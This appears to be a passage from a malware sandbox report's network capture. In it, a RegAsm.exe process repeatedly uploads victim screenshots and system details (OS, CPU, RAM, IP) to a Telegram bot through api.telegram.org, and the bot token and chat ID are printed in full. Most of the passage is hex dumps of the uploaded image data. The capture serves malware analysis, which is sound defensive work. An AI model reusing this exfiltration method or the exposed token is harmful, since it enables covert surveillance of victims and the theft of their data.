                                              2024-05-23 18:26:17 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 64 62 61 35 61 39 65 39 38 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 64 62 61 35 61 39 65 39 38 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 36 2f 32 30 32 34 20 32 31 3a 32 31 3a 34 35 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcadba5a9e9843Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcadba5a9e9843Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/26/2024 21:21:45User
                                              2024-05-23 18:26:17 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:26:17 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:26:17 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:26:17 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:26:17 UTC1355OUTData Raw: d4 9e ff 00 8d 61 d1 45 00 14 51 45 30 0a d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 59 14 52 03 4e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 28 a0 02 8a 28 a0 02 ba e9 bc 63 15 cc 71 24 b6 8f 1f 96 b8 05 58 36 7f 96 3a 57 23 45 24 97 3a 9f 55 b0 3d 62 e3 d1 9d 94 de 36 86 78 bc a6 d3 4c 40 f5 75 90 31 fc b0 3f 9d 67 eb 3e 25 5d 47 48 5d 39 2d 99 55 5c 38 91 9b 93 8c f6 c7 bf ad 73 b4 56 71 a3 08 c5 41 2d 13 bf 5d ca 73 6e 5c dd 6d 60 a2 8a 2b 52 42 b7 b4 ad 59 04 4b 04 ed b1 97 85 6f 51 58 34 54 ca 2a 4a cc 89 c1 4d 59 9e 99 a6 ea 77 77 2d b5 ef 36 c0 83 2f 21 da 0e 3d 37 75 fd 6b 2b c5 5e 27 82 4b 57 b0 b0 90 48 64 18 92 45 e8 07 a0 f5 ae 22 8a e4 78 35 3a aa a5 47 7b 6c
                                              Data Ascii: aEQE0>qu,y_'8QYRN]ryO>h%,$C((cq$X6:W#E$:U=b6xL@u1?g>%]GH]9-U\8sVqA-]sn\m`+RBYKoQX4T*JMYww-6/!=7uk+^'KWHdE"x5:G{l
                                              2024-05-23 18:26:17 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 64 62 61 35 61 39 65 39 38 34 33 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcadba5a9e9843--
                                              2024-05-23 18:26:18 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:26:18 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":269,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488778,"document":{"file_name":"user-715575 2024-07-26 21-31-47.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgENZk-KSRmleqx03gFJOFCgwmkuB6wAAsMTAALx64FSdUB_aLnif9cBAAdtAAM1BA","file_unique_id":"AQADwxMAAvHrgVJy","file_size":12368,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgENZk-KSRmleqx03gFJOFCgwmkuB6wAAsMTAALx64FSdUB_aLnif9cBAAdtAAM1BA","file_unique_id":"AQADwxMAAvHrgVJy","file_size":12368,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBDWZPikkZpXqsdN4BSThQoMJpLgesAALDEwAC8euBUnVAf2i54n_XNQQ","file_unique_id":"AgADwxMAAvHrgVI","file_size":66312},"caption":"New SC Recovered!\n\nTime: 07/26/2024 21:21:45\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.749732149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:30 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcb3cc81a7aace
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:26:31 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:26:31 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 33 63 63 38 31 61 37 61 61 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 33 63 63 38 31 61 37 61 61 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 30 33 2f 32 30 32 34 20 31 34 3a 34 36 3a 34 34 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcb3cc81a7aaceContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcb3cc81a7aaceContent-Disposition: form-data; name="caption"New SC Recovered!Time: 08/03/2024 14:46:44User
                                              2024-05-23 18:26:31 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:26:31 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:26:31 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:26:31 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:26:31 UTC1355OUTData Raw: d4 9e ff 00 8d 61 d1 45 00 14 51 45 30 0a d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 59 14 52 03 4e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 28 a0 02 8a 28 a0 02 ba e9 bc 63 15 cc 71 24 b6 8f 1f 96 b8 05 58 36 7f 96 3a 57 23 45 24 97 3a 9f 55 b0 3d 62 e3 d1 9d 94 de 36 86 78 bc a6 d3 4c 40 f5 75 90 31 fc b0 3f 9d 67 eb 3e 25 5d 47 48 5d 39 2d 99 55 5c 38 91 9b 93 8c f6 c7 bf ad 73 b4 56 71 a3 08 c5 41 2d 13 bf 5d ca 73 6e 5c dd 6d 60 a2 8a 2b 52 42 b7 b4 ad 59 04 4b 04 ed b1 97 85 6f 51 58 34 54 ca 2a 4a cc 89 c1 4d 59 9e 99 a6 ea 77 77 2d b5 ef 36 c0 83 2f 21 da 0e 3d 37 75 fd 6b 2b c5 5e 27 82 4b 57 b0 b0 90 48 64 18 92 45 e8 07 a0 f5 ae 22 8a e4 78 35 3a aa a5 47 7b 6c
                                              Data Ascii: aEQE0>qu,y_'8QYRN]ryO>h%,$C((cq$X6:W#E$:U=b6xL@u1?g>%]GH]9-U\8sVqA-]sn\m`+RBYKoQX4T*JMYww-6/!=7uk+^'KWHdE"x5:G{l
                                              2024-05-23 18:26:31 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 33 63 63 38 31 61 37 61 61 63 65 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcb3cc81a7aace--
                                              2024-05-23 18:26:31 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:26:31 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":270,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488791,"document":{"file_name":"user-715575 2024-08-03 14-56-50.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEOZk-KV30mFrTuaHhsNEuoJQV8WgYAAsQTAALx64FS2gqegcThZrYBAAdtAAM1BA","file_unique_id":"AQADxBMAAvHrgVJy","file_size":12368,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEOZk-KV30mFrTuaHhsNEuoJQV8WgYAAsQTAALx64FS2gqegcThZrYBAAdtAAM1BA","file_unique_id":"AQADxBMAAvHrgVJy","file_size":12368,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBDmZPild9Jha07mh4bDRLqCUFfFoGAALEEwAC8euBUtoKnoHE4Wa2NQQ","file_unique_id":"AgADxBMAAvHrgVI","file_size":66312},"caption":"New SC Recovered!\n\nTime: 08/03/2024 14:46:44\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.749733149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:34 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcb6faaaa8a6a3
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.749734149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:34 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcb90630e83599
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:26:35 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:26:35 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 39 30 36 33 30 65 38 33 35 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 39 30 36 33 30 65 38 33 35 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 31 30 2f 32 30 32 34 20 30 36 3a 32 32 3a 32 30 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcb90630e83599Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcb90630e83599Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/10/2024 06:22:20User
                                              2024-05-23 18:26:35 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:26:35 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:26:35 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 